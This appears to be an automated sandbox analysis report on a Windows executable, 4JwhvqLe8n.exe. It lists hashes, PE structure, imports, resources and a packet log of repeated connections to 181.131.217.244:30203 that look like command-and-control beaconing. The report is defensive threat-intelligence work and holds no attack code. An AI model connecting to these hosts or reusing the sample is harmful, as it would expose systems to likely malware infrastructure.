                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:4JwhvqLe8n.exe
                                                            File size:2'652'160 bytes
                                                            MD5:b58e300ca8077adc4094e9044bcdbbc8
                                                            SHA1:abc3b46626e17e22b744b9fe44833919255121ce
                                                            SHA256:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
                                                            SHA512:abfae0cd1d5b9a1475449f1f4ece4c72d7731bf1e01e721ebf31e656c65406b430f87b65334a9e9150530357f58b6ea7d31b5d55b4ae9800ad64d9bdc5998ea3
                                                            SSDEEP:24576:Mo48sSW8kD+xpdPChyjn4CqnlwRsdkoAgEsJUtDkMvF9Am:p4bIk6qhyL4osdkovEsJUFxPJ
                                                            TLSH:45C56CC6D940C847F97A19FDE91A78F0422F3FB9D93EA06B9B907F2DB231AC10415952
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8)4.|HZ.|HZ.|HZ.g...jHZ.g....HZ.g...GHZ.u0..qHZ.|H[..HZ.g...kHZ.g...}HZ.g...}HZ.Rich|HZ.........................PE..L......d...

                                                            File Icon

                                                            Icon Hash:070b71b030211f88

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x415891
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64ECE0A8 [Mon Aug 28 18:00:08 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:fba9a06cd911d183f0aec1159c439b07

                                                            Authenticode Signature

                                                            Signature Valid:
                                                            Signature Issuer:
                                                            Signature Validation Error:
                                                            Error Number:
                                                            Not Before, Not After
                                                              Subject Chain
                                                                Version:
                                                                Thumbprint MD5:
                                                                Thumbprint SHA-1:
                                                                Thumbprint SHA-256:
                                                                Serial:

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007FAF890FFEDDh
                                                                jmp 00007FAF890F919Eh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                mov edx, dword ptr [esp+0Ch]
                                                                mov ecx, dword ptr [esp+04h]
                                                                test edx, edx
                                                                je 00007FAF890F937Bh
                                                                xor eax, eax
                                                                mov al, byte ptr [esp+08h]
                                                                test al, al
                                                                jne 00007FAF890F9328h
                                                                cmp edx, 00000080h
                                                                jc 00007FAF890F9320h
                                                                cmp dword ptr [00432CC0h], 00000000h
                                                                je 00007FAF890F9317h
                                                                jmp 00007FAF890FFF42h
                                                                push edi
                                                                mov edi, ecx
                                                                cmp edx, 04h
                                                                jc 00007FAF890F9343h
                                                                neg ecx
                                                                and ecx, 03h
                                                                je 00007FAF890F931Eh
                                                                sub edx, ecx
                                                                mov byte ptr [edi], al
                                                                add edi, 01h
                                                                sub ecx, 01h
                                                                jne 00007FAF890F9308h
                                                                mov ecx, eax
                                                                shl eax, 08h
                                                                add eax, ecx
                                                                mov ecx, eax
                                                                shl eax, 10h
                                                                add eax, ecx
                                                                mov ecx, edx
                                                                and edx, 03h
                                                                shr ecx, 02h
                                                                je 00007FAF890F9318h
                                                                rep stosd
                                                                test edx, edx
                                                                je 00007FAF890F931Ch
                                                                mov byte ptr [edi], al
                                                                add edi, 01h
                                                                sub edx, 01h
                                                                jne 00007FAF890F9308h
                                                                mov eax, dword ptr [esp+08h]
                                                                pop edi
                                                                ret
                                                                mov eax, dword ptr [esp+04h]
                                                                ret
                                                                mov edi, edi
                                                                push ebp
                                                                mov ebp, esp
                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                push ebx
                                                                xor ebx, ebx
                                                                cmp ecx, ebx
                                                                jbe 00007FAF890F932Dh
                                                                push FFFFFFE0h
                                                                xor edx, edx
                                                                pop eax
                                                                div ecx
                                                                cmp eax, dword ptr [ebp+10h]
                                                                jnc 00007FAF890F9321h
                                                                call 00007FAF890F7DDEh
                                                                mov dword ptr [eax], 0000000Ch
                                                                xor eax, eax
                                                                jmp 00007FAF890F9353h
                                                                imul ecx, dword ptr [ebp+10h]
                                                                push esi
                                                                push edi
                                                                mov esi, ecx
                                                                cmp dword ptr [ebp+08h], ebx
                                                                je 00007FAF890F931Dh
                                                                push dword ptr [ebp+08h]
                                                                call 00007FAF890FA9FEh

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ASM] VS2010 SP1 build 40219
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [C++] VS2010 SP1 build 40219
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2f4c40x78.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x2573d0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xc7e000x2860.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000x22fc.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x272b00x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c1500x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x270000x1bc.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x260000x25400322bee9ae1b5d94b5b2fb7fb5a6af11dFalse0.5403143351510067data6.613060638092758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x270000x90000x900081a1c90b898ffbd833b6d78098a5839eFalse0.3275282118055556data4.397029732712187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x300000x40000x1c0084f180ff30a786befa816e36aabd66fcFalse0.2925502232142857data4.000425788178025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x340000x2573d00x257400922980e07f33f2cbed318f9698257843unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_BITMAP0x349240x1d4e8Device independent bitmap graphic, 200 x 200 x 24, image size 120000, resolution 3780 x 3780 px/m0.651107964011996
                                                                RT_BITMAP0x51e0c0x9ea4Device independent bitmap graphic, 483 x 21 x 32, image size 40572, resolution 3582 x 3582 px/m0.36169112577563284
                                                                RT_BITMAP0x5bcb00x50138PC bitmap, Windows 3.x format, 41447 x 2 x 40, image size 328097, cbSize 327992, bits offset 540.9418796799921949
                                                                RT_ICON0xabde80x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 148800.1794906166219839
                                                                RT_ICON0xaf8300xcd63PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8217158941782841
                                                                RT_ICON0xbc5940x43db6PC bitmap, Windows 3.x format, 34872 x 2 x 46, image size 278651, cbSize 277942, bits offset 540.9944844607867829
                                                                RT_ICON0x10034c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.21341463414634146
                                                                RT_ICON0x1009b40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.271505376344086
                                                                RT_ICON0x100c9c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.36475409836065575
                                                                RT_ICON0x100e840x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4864864864864865
                                                                RT_ICON0x100fac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.12366737739872068
                                                                RT_ICON0x101e540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.14620938628158844
                                                                RT_ICON0x1026fc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.16589861751152074
                                                                RT_ICON0x102dc40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.16257225433526012
                                                                RT_ICON0x10332c0x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.018600023670740005
                                                                RT_ICON0x1453540x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.08858921161825727
                                                                RT_ICON0x1478fc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12617260787992496
                                                                RT_ICON0x1489a40x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.1819672131147541
                                                                RT_ICON0x14932c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.26684397163120566
                                                                RT_ICON0x1497940x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.21341463414634146
                                                                RT_ICON0x149dfc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.271505376344086
                                                                RT_ICON0x14a0e40x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.36475409836065575
                                                                RT_ICON0x14a2cc0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.4864864864864865
                                                                RT_ICON0x14a3f40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.12366737739872068
                                                                RT_ICON0x14b29c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.14620938628158844
                                                                RT_ICON0x14bb440x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.16589861751152074
                                                                RT_ICON0x14c20c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.16257225433526012
                                                                RT_ICON0x14c7740x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.018600023670740005
                                                                RT_ICON0x18e79c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.08858921161825727
                                                                RT_ICON0x190d440x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.12617260787992496
                                                                RT_ICON0x191dec0x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.1819672131147541
                                                                RT_ICON0x1927740x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.26684397163120566
                                                                RT_MENU0x192bdc0x4adataEnglishUnited States0.8648648648648649
                                                                RT_DIALOG0x192c280x10adataEnglishUnited States0.6804511278195489
                                                                RT_STRING0x192d340x70dataEnglishUnited States0.6785714285714286
                                                                RT_ACCELERATOR0x192da40x10dataEnglishUnited States1.25
                                                                RT_RCDATA0x192db40xf7eceDelphi compiled form 'TfPNGMessage'0.20263081707372316
                                                                RT_GROUP_ICON0x28ac840xbcdataEnglishUnited States0.5904255319148937
                                                                RT_GROUP_ICON0x28ad400xbcdataEnglishUnited States0.6117021276595744
                                                                RT_VERSION0x28adfc0x37cdataEnglishUnited States0.4226457399103139
                                                                RT_MANIFEST0x28b1780x255ASCII text, with very long lines (353), with CRLF line terminatorsEnglishUnited States0.4991624790619765

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllFreeEnvironmentStringsW, CloseHandle, LocalFree, ResumeThread, lstrcpyW, FreeLibrary, LoadLibraryW, MultiByteToWideChar, GetProcAddress, Sleep, lstrcpynW, SetFilePointerEx, WriteFile, ReadFile, CreateFileW, FlushFileBuffers, GetFileSizeEx, RaiseException, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, GetLocaleInfoA, GetLocaleInfoW, SetFilePointer, AllocConsole, FreeConsole, GetStdHandle, lstrcmpiW, FormatMessageW, QueryPerformanceCounter, ReleaseSemaphore, CreateSemaphoreW, OpenSemaphoreW, GetConsoleMode, GetConsoleCP, RtlUnwind, GetSystemTimeAsFileTime, SetCurrentDirectoryW, FindResourceExW, GetLastError, GetStartupInfoW, lstrlenW, GetModuleFileNameW, GetEnvironmentStringsW, CreateProcessW, GetEnvironmentVariableW, GetCommandLineW, LockResource, SizeofResource, WideCharToMultiByte, LoadResource, FindResourceW, GetCurrentProcessId, GetTickCount, SetHandleCount, LCMapStringW, HeapCreate, IsProcessorFeaturePresent, GetStringTypeW, ExitProcess, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, EncodePointer, DecodePointer, SetStdHandle, GetFileType, WriteConsoleW, HeapSetInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId
                                                                USER32.dllGetDesktopWindow, MessageBoxW
                                                                ADVAPI32.dllRegQueryValueExW, RegOpenKeyW, IsTextUnicode, RegCreateKeyW, RegSetValueExW, RegCloseKey, RegOpenKeyExW, RegCreateKeyExW
                                                                SHELL32.dllCommandLineToArgvW
                                                                SHLWAPI.dllStrNCatW, PathFileExistsW, UrlEscapeW, UrlUnescapeW

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 12, 2024 17:52:49.038386106 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:49.183659077 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:49.183774948 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:49.278188944 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:49.398365974 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:49.398659945 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:49.573280096 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:50.552381039 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:50.597382069 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:50.785814047 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:50.818085909 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:50.944050074 CET3020349766181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:50.944236994 CET4976630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:51.542293072 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:51.542336941 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:51.542412043 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:51.557173967 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:51.557200909 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:52.983409882 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:52.983498096 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.144628048 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.144655943 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.145642042 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.191122055 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.356070995 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.403321981 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.958321095 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.958350897 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.958404064 CET44349772185.166.143.49192.168.2.10
                                                                Dec 12, 2024 17:52:53.958416939 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.958439112 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.958487034 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:53.963701010 CET49772443192.168.2.10185.166.143.49
                                                                Dec 12, 2024 17:52:54.083100080 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:54.203099966 CET3020349778181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:54.203202963 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:54.203950882 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:54.323925018 CET3020349778181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:54.324045897 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:54.463037968 CET3020349778181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:55.564188004 CET3020349778181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:55.564289093 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:55.565287113 CET4977830203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:55.676664114 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:55.689600945 CET3020349778181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:55.804349899 CET3020349780181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:55.805937052 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:55.823251963 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:55.943239927 CET3020349780181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:55.943300962 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:56.063018084 CET3020349780181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:57.164239883 CET3020349780181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:57.164326906 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.164526939 CET4978030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.270262957 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.284740925 CET3020349780181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:57.390197992 CET3020349786181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:57.393997908 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.394974947 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.514681101 CET3020349786181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:52:57.517946959 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:52:57.638257980 CET3020349786181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:01.906131983 CET3020349786181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:01.906246901 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:01.906450033 CET4978630203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:02.021007061 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:02.026441097 CET3020349786181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:02.141035080 CET3020349797181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:02.141130924 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:02.141910076 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:02.261806965 CET3020349797181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:02.261991024 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:02.381803036 CET3020349797181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:12.523837090 CET3020349797181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:12.525146008 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.525300980 CET4979730203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.630116940 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.644995928 CET3020349797181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:12.749877930 CET3020349823181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:12.750195980 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.751038074 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.870910883 CET3020349823181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:12.870995045 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:12.994607925 CET3020349823181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:17.131793976 CET3020349823181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:17.131906986 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.132008076 CET4982330203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.239223957 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.256107092 CET3020349823181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:17.358966112 CET3020349834181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:17.359045982 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.359864950 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.483408928 CET3020349834181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:17.483464003 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:17.603230000 CET3020349834181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:21.732676983 CET3020349834181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:21.732789040 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:21.732958078 CET4983430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:21.848676920 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:21.854048967 CET3020349834181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:21.968672991 CET3020349844181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:21.968911886 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:21.969926119 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:22.089628935 CET3020349844181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:22.089760065 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:22.209805965 CET3020349844181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:23.459825993 CET3020349844181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:23.461875916 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.461875916 CET4984430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.567245960 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.581614017 CET3020349844181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:23.687236071 CET3020349851181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:23.687377930 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.688163996 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.808346033 CET3020349851181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:23.808440924 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:23.928364992 CET3020349851181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:25.202486992 CET3020349851181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:25.202541113 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.202797890 CET4985130203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.316998959 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.323143005 CET3020349851181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:25.437930107 CET3020349855181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:25.438039064 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.438796043 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.561582088 CET3020349855181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:25.561665058 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:25.681504965 CET3020349855181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:26.792310953 CET3020349855181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:26.792378902 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:26.792570114 CET4985530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:26.898076057 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:26.912681103 CET3020349855181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:27.018052101 CET3020349859181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:27.018254042 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:27.054733038 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:27.174801111 CET3020349859181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:27.174884081 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:27.294811010 CET3020349859181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:28.504092932 CET3020349859181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:28.504179955 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.504324913 CET4985930203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.614132881 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.624258995 CET3020349859181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:28.734090090 CET3020349865181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:28.736249924 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.736921072 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.857044935 CET3020349865181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:28.860019922 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:28.979902029 CET3020349865181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:30.094089985 CET3020349865181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:30.094153881 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.094810009 CET4986530203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.208444118 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.218039989 CET3020349865181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:30.328485012 CET3020349870181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:30.328639030 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.329389095 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.449076891 CET3020349870181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:30.449134111 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:30.568999052 CET3020349870181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:31.733891964 CET3020349870181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:31.733998060 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:31.734224081 CET4987030203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:31.848396063 CET4987430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:31.856472015 CET3020349870181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:31.968240023 CET3020349874181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:31.969983101 CET4987430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:31.970729113 CET4987430203192.168.2.10181.131.217.244
                                                                Dec 12, 2024 17:53:32.090614080 CET3020349874181.131.217.244192.168.2.10
                                                                Dec 12, 2024 17:53:32.093993902 CET4987430203192.168.2.10181.131.217.244
